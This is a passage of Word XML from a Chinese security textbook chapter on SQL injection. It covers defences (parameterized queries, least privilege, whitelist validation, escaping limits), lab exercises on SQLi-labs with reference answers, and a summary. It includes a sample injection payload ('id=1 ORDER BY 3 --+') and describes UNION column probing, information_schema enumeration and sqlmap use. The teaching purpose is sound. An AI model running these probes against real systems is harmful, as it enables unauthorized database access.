      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Query）将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句结构与用户数据彻底分离。在预编译阶段，数据库先解析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模板，参数值后续传入时仅被视为字面量数据，永不作为代码执行。例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP/PDO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$stmt = $pdo-&gt;prepare('SELECT * FROM users WHERE username=?'); $stmt-&gt;execute([$username]);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。此方法对所有标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入变种均免疫。该方法被称为“根治”的原因是它从语言层面消除了数据与代码边界混淆的可能。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限数据库账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用使用的数据库账户应仅拥有执行其业务所需的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——应用账户不应具有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SHUTDOWN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、访问非业务数据库的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限。即使注入成功，攻击者也无法横向访问敏感系统库或执行破坏性操作（纵深防御，非根治，但不能替代参数化）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">输入校验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在应用层对所有用户输入执行白名单校验（如数字</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">严格匹配</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">^[0-9]+$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），异常值拒绝而非过滤。黑名单（如过滤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等关键字）易被编码变异绕过，不可依赖。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">框架注意事项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ORM（Object-Relational</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapping，对象关系映射）默认使用参数化查询，但在允许原生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拼接或动态排序字段（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY ?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在部分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中不支持参数化）的场景下，仍有注入风险。开发者必须审查所有涉及字符串拼接的原生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">片段。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">转义的局限性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql_real_escape_string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等转义函数试图过滤危险字符，但历史上已出现多次绕过（如字符集绕过、特定上下文未转义），不能作为主要防线。[简化]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转义是一层额外的防护网，但不可替代参数化。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[/防御对照框]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：用你自己的语言解释为什么参数化查询能够“根治”SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入，而转义函数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql_real_escape_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）不能。提示：从“数据与代码边界”的视角阐述。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在联合注入中，攻击者为什么必须先确定原查询的列数？如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的列数不正确会产生什么后果？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi-labs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Less-2（数值型注入，无单引号闭合），比较与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Less-1（字符型注入）在闭合方式上的差异。记录你使用的手工</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload（用占位符表示环境依赖值），并尝试用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自动完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Less-2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的数据库枚举。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答与提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题提示：参数化查询在数据库引擎解析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句之前就将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码与数据分离——代码路径在准备阶段锁定，数据在后续执行阶段作为纯数据绑定，无法改变语法树。转义仅做字符串级别的字符过滤，任何遗漏的上下文（如无引号数值上下文、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通配符上下文）都可能被绕过。参考答案：见本节防御对照框”参数化查询/预编译语句”部分。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题提示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求所有参与联合的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句返回列数相同。若列数不匹配，数据库直接抛出错误，拒绝执行。参考答案：攻击者使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列逐步确定列数，确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">能够合法嵌入。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题提示：Less-2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数不需要单引号闭合——原查询为数值型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id=?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只需直接拼接数字即可，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1 ORDER BY 3 --+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的本质是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据与代码边界被混淆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：用户输入中的引号、注释符、SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字逃逸出数据上下文，被数据库引擎作为代码执行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入点定位通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">闭合试探与错误观察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实现：单引号、双引号、圆括号的组合推断原</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句结构。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">联合注入（UNION-Based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi）在有回显的场景下，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附加攻击者查询，需先通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列探测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">列数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，再标记回显位置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL/MariaDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等数据库中标准的元数据视图，攻击者通过它可枚举数据库、表、列的完整结构，进而提取敏感数据。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自动化工具</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">大幅提高了注入的效率和成功率，但其流量特征明显，易被检测。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御的标杆方案是参数化查询/预编译语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，配合最小权限账户、白名单输入校验、数据库审计日志和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">形成纵深防御。转义函数只能作为辅助，不可视为根治。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP Testing Guide v4.2 →</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Testing for SQL Injection”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章节，详述注入点探测方法论和各类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试用例。</w:t>
      </w:r>
